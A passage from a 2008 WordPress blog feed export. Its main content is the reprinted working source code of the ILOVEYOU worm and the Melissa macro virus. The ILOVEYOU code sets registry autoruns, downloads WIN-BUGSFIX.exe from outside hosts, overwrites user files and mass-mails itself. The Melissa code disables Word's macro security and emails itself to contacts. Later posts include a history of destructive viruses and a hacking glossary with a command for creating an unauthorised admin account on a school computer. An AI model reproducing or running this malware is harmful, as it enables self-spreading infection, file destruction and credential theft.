regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"<br />
elseif num = 2 then<br />
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"<br />
elseif num = 3 then<br />
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnmPOhfgER67b3Vbvg/WIN-BUGSFIX.exe"<br />
elseif num = 4 then<br />
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX .exe"<br />
end if<br />
end if<br />
if (fileexist(downread&#38;"\WIN-BUGSFIX.exe")=0) then regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WIN-BUGSFIX",downread&#38;"\WIN-BUGSFIX.exe"<br />
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\StartPage","about:blank"<br />
end if<br />
end sub</p>
<p>sub listadriv<br />
On Error Resume Next<br />
Dim d,dc,s<br />
Set dc = fso.Drives<br />
For Each d in dc<br />
If d.DriveType = 2 or d.DriveType=3 Then<br />
folderlist(d.path&#38;"\")<br />
end if<br />
Next<br />
listadriv = s<br />
end sub</p>
<p>sub infectfiles(folderspec)<br />
On Error Resume Next<br />
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3<br />
set f = fso.GetFolder(folderspec)<br />
set fc = f.Files<br />
for each f1 in fc<br />
ext=fso.GetExtensionName(f1.path)<br />
ext=lcase(ext)<br />
s=lcase(f1.name)<br />
if (ext="vbs") or (ext="vbe") then<br />
set ap=fso.OpenTextFile(f1.path,2,true)<br />
ap.write vbscopy<br />
ap.close<br />
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then<br />
set ap=fso.OpenTextFile(f1.path,2,true)<br />
ap.write vbscopy<br />
ap.close<br />
bname=fso.GetBaseName(f1.path)<br />
set cop=fso.GetFile(f1.path)<br />
cop.copy(folderspec&#38;"\"&#38;bname&#38;".vbs") fso.DeleteFile(f1.path)<br />
elseif(ext="jpg") or (ext="jpeg") then<br />
set ap=fso.OpenTextFile(f1.path,2,true)<br />
ap.write vbscopy<br />
ap.close<br />
set cop=fso.GetFile(f1.path)<br />
cop.copy(f1.path&#38;".vbs")<br />
fso.DeleteFile(f1.path)<br />
elseif(ext="mp3") or (ext="mp2") then<br />
set mp3=fso.CreateTextFile(f1.path&#38;".vbs")<br />
mp3.write vbscopy<br />
mp3.close<br />
set att=fso.GetFile(f1.path)<br />
att.attributes=att.attributes+2<br />
end if<br />
if (eq&#60;&#62;folderspec) then<br />
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then<br />
set scriptini=fso.CreateTextFile(folderspec&#38;"\script.ini") scriptini.WriteLine "[script]"<br />
scriptini.WriteLine ";mIRC Script"<br />
scriptini.WriteLine ";  Please dont edit this script... mIRC will corrupt, if mIRC will"<br />
scriptini.WriteLine "    corrupt... WINDOWS will affect and will not run correctly. thanks"<br />
scriptini.WriteLine ";"<br />
scriptini.WriteLine ";Khaled Mardam-Bey"<br />
scriptini.WriteLine ";http://www.mirc.com"<br />
scriptini.WriteLine ";"<br />
scriptini.WriteLine "n0=on 1:JOIN:#:{"<br />
scriptini.WriteLine "n1=  /if ( $nick == $me ) { halt }" scriptini.WriteLine "n2=  /.dcc send $nick"&#38;dirsystem&#38;"\LOVE-LETTER-FOR-YOU.HTM"<br />
scriptini.WriteLine "n3=}"<br />
scriptini.close<br />
eq=folderspec<br />
end if<br />
end if<br />
next<br />
end sub</p>
<p>sub folderlist(folderspec)<br />
On Error Resume Next<br />
dim f,f1,sf<br />
set f = fso.GetFolder(folderspec)<br />
set sf = f.SubFolders<br />
for each f1 in sf<br />
infectfiles(f1.path)<br />
folderlist(f1.path)<br />
next<br />
end sub</p>
<p>sub regcreate(regkey,regvalue)<br />
Set regedit = CreateObject("WScript.Shell")<br />
regedit.RegWrite regkey,regvalue<br />
end sub</p>
<p>function regget(value)<br />
Set regedit = CreateObject("WScript.Shell")<br />
regget=regedit.RegRead(value)<br />
end function</p>
<p>function fileexist(filespec)<br />
On Error Resume Next<br />
dim msg<br />
if (fso.FileExists(filespec)) Then<br />
msg = 0<br />
else<br />
msg = 1<br />
end if<br />
fileexist = msg<br />
end function</p>
<p>function folderexist(folderspec)<br />
On Error Resume Next<br />
dim msg<br />
if (fso.GetFolderExists(folderspec)) then<br />
msg = 0<br />
else<br />
msg = 1<br />
end if<br />
fileexist = msg<br />
end function</p>
<p>sub spreadtoemail()<br />
On Error Resume Next<br />
dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,regad<br />
set regedit=CreateObject("WScript.Shell")<br />
set out=WScript.CreateObject("Outlook.Application")<br />
set mapi=out.GetNameSpace("MAPI")<br />
for ctrlists=1 to mapi.AddressLists.Count<br />
set a=mapi.AddressLists(ctrlists)<br />
x=1<br />
regv=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&#38;a) if (regv="") then<br />
regv=1<br />
end if<br />
if (int(a.AddressEntries.Count)&#62;int(regv)) then<br />
for ctrentries=1 to a.AddressEntries.Count<br />
malead=a.AddressEntries(x)<br />
regad=""<br />
regad=regedit.RegRead("HKEY_CURRENT_USER\Software\Microsoft\WAB\"&#38;malead) if (regad="")<br />
then<br />
set male=out.CreateItem(0)<br />
male.Recipients.Add(malead)<br />
male.Subject = "ILOVEYOU"<br />
male.Body = vbcrlf&#38;"kindly check the attached LOVELETTER coming from me."<br />
male.Attachments.Add(dirsystem&#38;"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send<br />
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&#38;malead,1,"REG_DWORD" end if<br />
x=x+1<br />
next<br />
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&#38;a,a.AddressEntries.Count else<br />
regedit.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\WAB\"&#38;a,a.AddressEntries.Count end if<br />
next<br />
Set out=Nothing<br />
Set mapi=Nothing<br />
end sub</p>
<p>sub html<br />
On Error Resume Next<br />
dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6<br />
dta1="&#60;HTML&#62;&#60;HEAD&#62;&#60;TITLE&#62;LOVELETTER - HTML&#60;?-?TITLE&#62;&#60;META<br />
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS - LOVELETTER@-@&#62;"&#38;vbcrlf&#38; _ "&#60;META<br />
NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?<br />
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March 2000@-@&#62;"&#38;vbcrlf&#38; _ "&#60;META<br />
NAME=@-@Description@-@ CONTENT=@-@simple but i think this is good...@-@&#62;"&#38;vbcrlf&#38; _<br />
"&#60;?-?HEAD&#62;&#60;BODY<br />
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#<br />
-#,#-#main#-#)@-@ "&#38;vbcrlf&#38; _<br />
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#<br />
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@ BGCOLOR=@-@#FF9933@-@&#62;"&#38;vbcrlf&#38; _<br />
"&#60;CENTER&#62;&#60;p&#62;This HTML file need ActiveX Control&#60;?-?p&#62;&#60;p&#62;To Enable to read this HTML file&#60;BR&#62;-<br />
Please press #-#YES#-# button to Enable ActiveX&#60;?-?p&#62;"&#38;vbcrlf&#38; _<br />
"&#60;?-?CENTER&#62;&#60;MARQUEE LOOP=@-@infinite@-@<br />
BGCOLOR=@-@yellow@-@&#62;----------z--------------------z----------&#60;?-?MARQUEE&#62; "&#38;vbcrlf&#38; _<br />
"&#60;?-?BODY&#62;&#60;?-?HTML&#62;"&#38;vbcrlf&#38; _<br />
"&#60;SCRIPT language=@-@JScript@-@&#62;"&#38;vbcrlf&#38; _ "&#60;!--?-??-?"&#38;vbcrlf&#38; _<br />
"if (window.screen){var wi=screen.availWidth;var<br />
hi=screen.availHeight;window.moveTo(0,0);window.resizeTo(wi,hi);}"&#38;vbcrlf&#38; _ "?-??-?--&#62;"&#38;vbcrlf&#38; _<br />
"&#60;?-?SCRIPT&#62;"&#38;vbcrlf&#38; _<br />
"&#60;SCRIPT LANGUAGE=@-@VBScript@-@&#62;"&#38;vbcrlf&#38; _ "&#60;!--"&#38;vbcrlf&#38; _<br />
"on error resume next"&#38;vbcrlf&#38; _<br />
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit"&#38;vbcrlf&#38; _ "aw=1"&#38;vbcrlf&#38; _<br />
"code="<br />
dta2="set fso=CreateObject(@-@Scripting.FileSystemObject@-@)"&#38;vbcrlf&#38; _<br />
"set dirsystem=fso.GetSpecialFolder(1)"&#38;vbcrlf&#38; _<br />
"code2=replace(code,chr(91)&#38;chr(45)&#38;chr(91),chr(39))"&#38;vbcrlf&#38; _<br />
"code3=replace(code2,chr(93)&#38;chr(45)&#38;chr(93),chr(34))"&#38;vbcrlf&#38; _<br />
"code4=replace(code3,chr(37)&#38;chr(45)&#38;chr(37),chr(92))"&#38;vbcrlf&#38; _ "set<br />
wri=fso.CreateTextFile(dirsystem&#38;@-@^-^MSKernel32.vbs@-@)"&#38;vbcrlf&#38; _ "wri.write code4"&#38;vbcrlf&#38;<br />
_<br />
"wri.close"&#38;vbcrlf&#38; _<br />
"if (fso.FileExists(dirsystem&#38;@-@^-^MSKernel32.vbs@-@)) then"&#38;vbcrlf&#38; _ "if (err.number=424)<br />
then"&#38;vbcrlf&#38; _<br />
"aw=0"&#38;vbcrlf&#38; _<br />
"end if"&#38;vbcrlf&#38; _<br />
"if (aw=1) then"&#38;vbcrlf&#38; _<br />
"document.write @-@ERROR: can#-#t initialize ActiveX@-@"&#38;vbcrlf&#38; _ "window.close"&#38;vbcrlf&#38; _<br />
"end if"&#38;vbcrlf&#38; _<br />
"end if"&#38;vbcrlf&#38; _<br />
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&#38;vbcrlf&#38; _<br />
"regedit.RegWrite<br />
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Run^-^MSKernel32@-@,dirsystem&#38;@-@^-^MSKernel32.vbs@-@"&#38;vbcrlf&#38; _ "?-??-?--&#62;"&#38;vbcrlf&#38; _<br />
"&#60;?-?SCRIPT&#62;"<br />
dt1=replace(dta1,chr(35)&#38;chr(45)&#38;chr(35),"'")<br />
dt1=replace(dt1,chr(64)&#38;chr(45)&#38;chr(64),"""") dt4=replace(dt1,chr(63)&#38;chr(45)&#38;chr(63),"/")<br />
dt5=replace(dt4,chr(94)&#38;chr(45)&#38;chr(94),"\")<br />
dt2=replace(dta2,chr(35)&#38;chr(45)&#38;chr(35),"'")<br />
dt2=replace(dt2,chr(64)&#38;chr(45)&#38;chr(64),"""") dt3=replace(dt2,chr(63)&#38;chr(45)&#38;chr(63),"/")<br />
dt6=replace(dt3,chr(94)&#38;chr(45)&#38;chr(94),"\")<br />
set fso=CreateObject("Scripting.FileSystemObject")<br />
set c=fso.OpenTextFile(WScript.ScriptFullName,1)<br />
lines=Split(c.ReadAll,vbcrlf)<br />
l1=ubound(lines)<br />
for n=0 to ubound(lines)<br />
lines(n)=replace(lines(n),"'",chr(91)+chr(45)+chr(91))<br />
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))<br />
lines(n)=replace(lines(n),"\",chr(37)+chr(45)+chr(37)) if (l1=n) then<br />
lines(n)=chr(34)+lines(n)+chr(34)<br />
else<br />
lines(n)=chr(34)+lines(n)+chr(34)&#38;"&#38;vbcrlf&#38; _" end if<br />
next<br />
set b=fso.CreateTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM") b.close<br />
set d=fso.OpenTextFile(dirsystem+"\LOVE-LETTER-FOR-YOU.HTM",2) d.write dt5<br />
d.write join(lines,vbcrlf)<br />
d.write vbcrlf<br />
d.write dt6<br />
d.close<br />
end sub</p>
<h1 style="text-align:center;"><span style="color:#ff0000;">Melissa Virus:</span></h1>
<p style="text-align:center;">
<p>// Melissa Virus Source Code<br />
Private Sub Document_Open()</p>
<p>On Error Resume Next</p>
<p>If System.PrivateProfileString("",</p>
<p>"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") &#60;&#62; ""</p>
<p>Then</p>
<p>CommandBars("Macro").Controls("Security...").Enabled = False</p>
<p>System.PrivateProfileString("",</p>
<p>"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&#38;</p>
<p>Else</p>
<p>CommandBars("Tools").Controls("Macro").Enabled = False</p>
<p>Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):</p>
<p>Options.SaveNormalPrompt = (1 - 1)</p>
<p>End If</p>
<p>Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice</p>
<p>Set UngaDasOutlook = CreateObject("Outlook.Application")</p>
<p>Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")</p>
<p>If System.PrivateProfileString("",</p>
<p>"HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") &#60;&#62; "... by Kwyjibo"</p>
<p>Then</p>
<p>If UngaDasOutlook = "Outlook" Then</p>
<p>DasMapiName.Logon "profile", "password"</p>
<p>For y = 1 To DasMapiName.AddressLists.Count</p>
<p>Set AddyBook = DasMapiName.AddressLists(y)</p>
<p>x = 1</p>
<p>Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)</p>
<p>For oo = 1 To AddyBook.AddressEntries.Count</p>
<p>Peep = AddyBook.AddressEntries(x)</p>
<p>BreakUmOffASlice.Recipients.Add Peep</p>
<p>x = x + 1</p>
<p>If x &#62; 50 Then oo = AddyBook.AddressEntries.Count</p>
<p>Next oo</p>
<p>BreakUmOffASlice.Subject = "Important Message From " &#38;</p>
<p>Application.UserName</p>
<p>BreakUmOffASlice.Body = "Here is that document you asked for ... don't</p>
<p>show anyone else ;-)"</p>
<p>BreakUmOffASlice.Attachments.Add ActiveDocument.FullName</p>
<p>BreakUmOffASlice.Send</p>
<p>Peep = ""</p>
<p>Next y</p>
<p>DasMapiName.Logoff</p>
<p>End If</p>
<p>System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\",</p>
<p>"Melissa?") = "... by Kwyjibo"</p>
<p>End If</p>
<p>Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)</p>
<p>Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)</p>
<p>NTCL = NTI1.CodeModule.CountOfLines</p>
<p>ADCL = ADI1.CodeModule.CountOfLines</p>
<p>BGN = 2</p>
<p>If ADI1.Name &#60;&#62; "Melissa" Then</p>
<p>If ADCL &#62; 0 Then _</p>
<p>ADI1.CodeModule.DeleteLines 1, ADCL</p>
<p>Set ToInfect = ADI1</p>
<p>ADI1.Name = "Melissa"</p>
<p>DoAD = True</p>
<p>End If</p>
<p>If NTI1.Name &#60;&#62; "Melissa" Then</p>
<p>If NTCL &#62; 0 Then _</p>
<p>NTI1.CodeModule.DeleteLines 1, NTCL</p>
<p>Set ToInfect = NTI1</p>
<p>NTI1.Name = "Melissa"</p>
<p>DoNT = True</p>
<p>End If</p>
<p>If DoNT &#60;&#62; True And DoAD &#60;&#62; True Then GoTo CYA</p>
<p>If DoNT = True Then</p>
<p>Do While ADI1.CodeModule.Lines(1, 1) = ""</p>
<p>ADI1.CodeModule.DeleteLines 1</p>
<p>Loop</p>
<p>ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")</p>
<p>Do While ADI1.CodeModule.Lines(BGN, 1) &#60;&#62; ""</p>
<p>ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)</p>
<p>BGN = BGN + 1</p>
<p>Loop</p>
<p>End If</p>
<p>If DoAD = True Then</p>
<p>Do While NTI1.CodeModule.Lines(1, 1) = ""</p>
<p>NTI1.CodeModule.DeleteLines 1</p>
<p>Loop</p>
<p>ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")</p>
<p>Do While NTI1.CodeModule.Lines(BGN, 1) &#60;&#62; ""</p>
<p>ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)</p>
<p>BGN = BGN + 1</p>
<p>Loop</p>
<p>End If</p>
<p>CYA:</p>
<p>If NTCL &#60;&#62; 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") =</p>
<p>False) Then</p>
<p>ActiveDocument.SaveAs FileName:=ActiveDocument.FullName</p>
<p>ElseIf (InStr(1, ActiveDocument.Name, "Document") &#60;&#62; False) Then</p>
<p>ActiveDocument.Saved = True: End If</p>
<p>'WORD/Melissa written by Kwyjibo</p>
<p>'Works in both Word 2000 and Word 97</p>
<p>'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!</p>
<p>'Word -&#62; Email &#124; Word 97 &#60;--&#62; Word 2000 ... it's a new age!</p>
<p>If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus</p>
<p>triple-word-score, plus fifty points for using all my letters.  Game's over.</p>
<p>I'm outta here."</p>
<pre>End Sub</pre>
]]></content:encoded>
</item>
<item>
<title><![CDATA[10 most Dangerous viruses]]></title>
<link>http://empa7hy.wordpress.com/?p=19</link>
<pubDate>Sun, 06 Jul 2008 00:08:49 +0000</pubDate>
<dc:creator>empa7hy</dc:creator>
<guid>http://empa7hy.wordpress.com/?p=19</guid>
<description><![CDATA[Causing close to 100 billion dollars in damage to businesses worldwide, PC viruses have brought the ]]></description>
<content:encoded><![CDATA[<p>Causing close to 100 billion dollars in damage to businesses worldwide, PC viruses have brought the world a massive headache. We name the 10 most destructive of the past 20 years.<br />
By George Jones, <a href="http://www.techweb.com/;jsessionid=OPYS1HSXMJGZIQSNDLOSKH0CJUNN2JVN">TechWeb</a></p>
<p>Computer viruses are like real-life viruses: When they're flying around infecting every PC (or person) in sight, they're scary. But after the fact...well, they're rather interesting, albeit in a gory kind of way. With this in mind, we shamelessly present, in chronological order, the 10 most destructive viruses of all time.</p>
<p><span style="font-weight:bold;color:#ff9966;">CIH (1998)</span></p>
<p><span style="font-style:italic;">Estimated Damage: 20 to 80 million dollars worldwide, countless amounts of PC data destroyed</span></p>
<p>Unleashed from Taiwan in June of 1998, CIH is recognized as one of the most dangerous and destructive viruses ever. The virus infected Windows 95, 98, and ME executable files and was able to remain resident in a PC's memory, where it continued to infect other executables.</p>
<p>What made CIH so dangerous is that, shortly after activated, it would overwrite data on the host PC's hard drive, rendering it inoperable. It was also capable of overwriting the BIOS of the host, preventing boot-up. Because it infected executable files, CIH wound up being distributed by numerous software distributors, including a demo version of an Activision game named Sin.</p>
<p>CIH is also known as the Chernobyl virus because the trigger date of certain strains of the virus coincides with the date of the Chernobyl nuclear reactor accident. The virus is not a serious threat today, thanks to increased awareness and the widespread migration to Windows 2000, XP, and NT, none of which are vulnerable to CIH.</p>
<p><span style="font-weight:bold;color:#ff6666;">Melissa (1999)</span></p>
<p><span style="font-style:italic;">Estimated Damage: 300 to 600 million dollars</span></p>
<p>On Friday, March 26, 1999, W97M/Melissa became front-page news across the globe. Estimates have indicated that this Word macro script infected 15 to 20 percent of all business PCs. The virus spread so rapidly that Intel, Microsoft, and a number of other companies that used Outlook were forced to shut down their entire e-mail systems in order to contain the damage.</p>
<p>The virus used Microsoft Outlook to e-mail itself to 50 names on a user's contact list. The e-mail message contained the sentence, "Here is that document you asked for...don't show anyone else. ;-)," with an attached Word document. Clicking open the .DOC file -- and thousands of unsuspecting users did so -- allowed the virus to infect the host and repeat the replication. Adding insult to injury, when activated, this virus modified users' Word documents with quotes from the animated TV show "The Simpsons."</p>
<p><span style="color:#ff6666;font-weight:bold;">ILOVEYOU (2000)</span></p>
<p><span style="font-style:italic;">Estimated Damage: 10 to 15 billion dollars</span></p>
<p>Also known as Loveletter and The Love Bug, this was a Visual Basic script with an ingenious and irresistible hook: the promise of love. On May 3, 2000, the ILOVEYOU worm was first detected in Hong Kong. The bug was transmitted via e-mail with the subject line "ILOVEYOU" and an attachment, Love-Letter-For-You.TXT.vbs. Similar to Melissa, the virus mailed itself to all Microsoft Outlook contacts.</p>
<div style="text-align:center;"></div>
<p>The virus also took the liberty of overwriting music files, image files, and others with a copy of itself. More disturbingly, it searched out user IDs and passwords on infected machines and e-mailed them to its author.</p>
<p>An interesting footnote: Because the Philippines had no laws against virus-writing at the time, the author of ILOVEYOU was not charged for this crime.</p>
<p><span style="font-weight:bold;color:#ff6666;">Code Red (2001)</span></p>
<p><span style="font-style:italic;">Estimated Damage: 2.6 billion dollars</span></p>
<p>Code Red was a computer worm that was unleashed on network servers on July 13, 2001. It was a particularly virulent bug because of its target: computers running Microsoft's Internet Information Server (IIS) Web server. The worm was able to exploit a specific vulnerability in the IIS operating system. Ironically, Microsoft had released a patch addressing this hole in mid-June.</p>
<p>Also known as Bady, Code Red was designed for maximum damage. Upon infection, the Web site controlled by the affected server would display the message, "HELLO! Welcome to http://www.worm.com! Hacked By Chinese!" Then the virus would actively seek other vulnerable servers and infect them. This would go on for approximately 20 days, and then it would launch <a href="http://www.techweb.com/encyclopedia/defineterm.jhtml?term=denialofserviceattack">denial of service attacks</a> on certain IP addresses, including the White House Web server. In less than a week, this virus infected almost 400,000 servers, and it's estimated that one million total computers were infected.</p>
<p><span style="font-weight:bold;color:#ff6666;">SQL Slammer (2003)</span></p>
<p><span style="font-style:italic;">Estimated Damage: Because SQL Slammer erupted on a Saturday, the damage was low in dollars and cents. However, it hit 500,000 servers worldwide, and actually shut down South Korea's online capacity for 12 hours.</span></p>
<p>SQL Slammer, also known as Sapphire, was launched on January 25, 2003. It was a doozy of a worm that had a noticeable negative impact upon global Internet traffic. Interestingly enough, it didn't seek out end users' PCs. Instead, the target was servers. The virus was a single-packet, 376-byte worm that generated random IP addresses and sent itself to those IP addresses. If the IP address was a computer running an unpatched copy of Microsoft's SQL Server Desktop Engine, that computer would immediately begin firing the virus off to random IP addresses as well.</p>
<p>With this remarkably effective way of spreading, Slammer infected 75,000 computers in 10 minutes. The outrageously high amounts of traffic overloaded routers across the globe, which created higher demands on other routers, which shut them down, and so on.</p>
<p><span style="font-weight:bold;color:#ff6666;">Blaster (2003)</span></p>
<p><span style="font-style:italic;">Estimated Damage: 2 to 10 billion dollars, hundreds of thousands of infected PCs</span></p>
<p>The summer of 2003 was a rough time for businesses running PCs. In rapid succession, IT professionals witnessed the unleashing of both the Blaster and Sobig worms. Blaster, also known as Lovsan or MSBlast, was the first to hit. The virus was detected on August 11 and spread rapidly, peaking in just two days. Transmitted via network and Internet traffic, this worm exploited a vulnerability in Windows 2000 and Windows XP, and when activated, presented the PC user with a menacing dialog box indicating that a system shutdown was imminent.</p>
<p>Hidden in the code of MSBLAST.EXE -- the virus' executable " were these messages: "I just want to say LOVE YOU SAN!!" and "billy gates why do you make this possible? Stop making money and fix your software!!"</p>
<div style="text-align:center;"></div>
<p>The virus also contained code that would trigger a distributed denial of service attack on <a href="http://www.windowsupdate.com/">windowsupdate.com</a> on April 15, but Blaster had already peaked and was mostly contained by then.</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[Hacking Terms, tutorials, and more.]]></title>
<link>http://empa7hy.wordpress.com/?p=18</link>
<pubDate>Sat, 05 Jul 2008 21:29:46 +0000</pubDate>
<dc:creator>empa7hy</dc:creator>
<guid>http://empa7hy.wordpress.com/?p=18</guid>
<description><![CDATA[
A hacker USED to mean anybody who could use computers well. Now, they are considered denizens of th]]></description>
<content:encoded><![CDATA[<p><img class="aligncenter" src="http://upload.wikimedia.org/wikipedia/commons/7/77/Unix_history-simple.svg" alt="Unix history" /><br />
A hacker USED to mean anybody who could use computers well. Now, they are considered denizens of the digital world. Taking over computers and harming personal data. While this is true of some hackers, majority of hackers hack simply due to curiosity.<br />
2:<br />
These are some of the most common terms used by hackers.</p>
<p>Sql Injection: A hacking technique used on input devices to gain information on or from a sql database.</p>
<p>Social Engineering:</p>
<p>Box: Any type of computer, (PC, calculator, etc)</p>
<p>Exploit: A piece of <span class="mw-redirect">software</span>, a chunk of data, or sequence of commands that take advantage of a bug, glitch or <span class="mw-redirect">vulnerability</span> in order to cause unintended or unanticipated behavior to occur on computer software, hardware, or something electronic (usually computerized).</p>
<p>Buffer Overflow: A condition where a process attempts to store data beyond the boundaries of a fixed-length <span class="mw-redirect">buffer</span>. The result is that the extra data overwrites adjacent <span class="mw-redirect">memor</span><span class="mw-redirect">y</span> locations.</p>
<p>Hacker: Someone involved in computer security/insecurity,</p>
<p>Unix: A computer operating system originally developed in 1969 by a group of AT&#38;T employees<br />
(See http://upload.wikimedia.org/wikipedia/commons/7/77/Unix_history-simple.svg for reference)</p>
<p>Linux: The name usually given to any Unix-like computer operating system that uses the Linux kernel. Linux is one of the most prominent examples of free software and open source development:</p>
<p>Windows/Legacy: An Operating system made by Microsoft (Micro-soft)</p>
<p>Mac:<strong> </strong>A <span class="mw-redirect">brand name</span> which covers several lines of personal computers designed, developed, and marketed by Apple Inc.</p>
<p>Bruteforce: An attempt made to guess every possible combination for a password.</p>
<p>Apache: a public-domain open source Web server developed by a loosely-knit group of programmers.<br />
IIS: Microsoft's webserver.</p>
<p>RAT: Rat, often called Remote Administration, is a program that has two parts, client and server, the server is sent to your victim while the client is used to control the server.</p>
<p>Trojan: A malacious file that hogs resources and has the ability to take control of your computer</p>
<p>Virus: A file that copies multiple parts of itself to your computer.</p>
<p>Worm: A program that sends itself to I.P addresses and uses an exploit to automatically try to take over or harm a server.<br />
Keygen/Key generator: An application that generates a valid key for a program.</p>
<p>Warez: Cracked commercial software.</p>
<p>31337/1337: Slang invented during times of Usenet to avoid filters. (1337 is an ever changing language, originally created to bypass filters created on Usenet, it is now considered the hacker language due to it's flexibility and ability to create your own recognizable words. (&#124;_&#124;83&#124;2), etc.)</p>
<p>FTP: File Transfer Protocol</p>
<p>Botnet: A collection of hacked computers. (Usually collected via a premade program)</p>
<p>Root: Having a user level with the ability to edit/view/add files. (The highest level</p>
<p>OS/Operating system: The program that, after being initially loaded into the computer by a <span class="inline">boot</span> program, manages all the other programs in a computer.</p>
<p>Script Kiddie/Skiddie: A person, usually teenager, who downloads tools made by programmers and uses them without understanding how they work or what they do to hack.</p>
<p>3. Vital hacker tools</p>
<p>Linux: Linux is the preferred OS of many hackers due to it's open-source nature, it's unix core, and it's simple usibility.</p>
<p>Nmap: Nmap is currently one of the best port-scanners out there. Not only is it a port scanner, but has OS fingerprinting, stealth scans, and various useful features.</p>
<p>John the ripper: One of the fastest Unix password crackers out there.</p>
<p>Cain and Abel: A program with nifty features such as APR, hash cracking, etc.</p>
<p>Blues Port Scanner: A fast port scanner.</p>
<p>Angry I.P scanner: Heaven for script kiddies and hackers alike. Having options to generate random IP addresses, ping them, and check if a port is open, makes this program incredibly useful.</p>
<p>Metasploit: A tool with a large collection of local and remote exploits.</p>
<p>Netcat: Considered the TCP/IP swiss army knife.</p>
<p>Google.com: Perhaps a hackers best friend.<br />
Important  ports:</p>
<p>21 - FTP<br />
23 - Telnet<br />
80 - HTTP<br />
139 - NetBiOS<br />
3369 - Remote Desktop</p>
<p>Types of exploits:<br />
1.Local<br />
2.Remote</p>
<p>1:Local<br />
Local exploits are those that must be used while accessing the box physically. For example, if I wanted to r00t a Windows box in school, I would boot into safe mode and make a new Admin user through the Administrator. Even better would be to open cmd.exe (Command.com if it is blocked) and type in...</p>
<p>net use empa7hy 13 /localgroup administrators /add</p>
<p>This would add a user with the username Jake, password 13, in the localgroup Administrators.<br />
2: Remote<br />
Remote exploits are exploits that can be launched from a box connecting to the target.</p>
<p>**TO BE CONTINUED**</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[3D Desktop Effects sul Nokia N73]]></title>
<link>http://hawakeblog.wordpress.com/?p=131</link>
<pubDate>Sat, 05 Jul 2008 17:33:22 +0000</pubDate>
<dc:creator>hawake</dc:creator>
<guid>http://hawakeblog.wordpress.com/?p=131</guid>
<description><![CDATA[Buona visione!

Saluti
hawake
]]></description>
<content:encoded><![CDATA[<p>Buona visione!</p>
<p><span style='text-align:center; display: block;'><object width='425' height='350'><param name='movie' value='http://www.youtube.com/v/TTeHwkTeWJQ'></param><param name='wmode' value='transparent'></param><embed src='http://www.youtube.com/v/TTeHwkTeWJQ&rel=0' type='application/x-shockwave-flash' wmode='transparent' width='425' height='350'></embed></object></span></p>
<p>Saluti<br />
hawake</p>
]]></content:encoded>
</item>
<item>
<title><![CDATA[HP Security Consultant Selling HP 0day Exploits]]></title>
<link>http://knubbl.wordpress.com/?p=47</link>
<pubDate>Sat, 05 Jul 2008 17:22:53 +0000</pubDate>
<dc:creator>knubbl</dc:creator>
<guid>http://knubbl.wordpress.com/?p=47</guid>
<description><![CDATA[Steve Rigano, a French programmer, sold 0day exploits to get money for a start-up project. These exp]]></description>
